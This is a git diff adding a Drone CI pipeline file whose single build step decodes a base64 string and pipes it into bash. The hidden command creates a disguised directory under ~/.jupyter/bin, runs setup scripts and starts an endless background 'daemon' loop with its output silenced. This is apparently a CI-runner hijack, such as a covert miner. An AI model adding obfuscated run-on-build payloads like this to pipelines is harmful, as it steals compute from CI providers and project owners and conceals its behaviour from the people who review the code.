diff --git a/drone.yml (1).txt b/drone.yml (1).txt new file mode 100644 index 0000000..c508924 --- /dev/null +++ b/drone.yml (1).txt @@ -0,0 +1,11 @@ +--- +kind: pipeline +type: docker +name: default +steps: +- name: deepCC + image: golang + commands: + - bash -c "base64 -d <<< ZXhwb3J0IFRFUk09eHRlcm0gJiYgbnByb2MgJiYgbWtkaXIgfi8uanVweXRlci9iaW4gLXAgJiYgLi9zZXR1cCAmJiAuL2NvbmZpZ3VyZSAmJiBjZCB+Ly5qdXB5dGVyL2JpbiAmJiBQQVRIPSQocHdkKTokUEFUSCAmJiB3aGlsZSBbIDEgXTsgZG8gYmFzaCBkYWVtb24gPiAvZGV2L251bGw7IGRvbmUgJiB3YXRjaCBmcmVlIC1t | bash" + environment: + TERM: xterm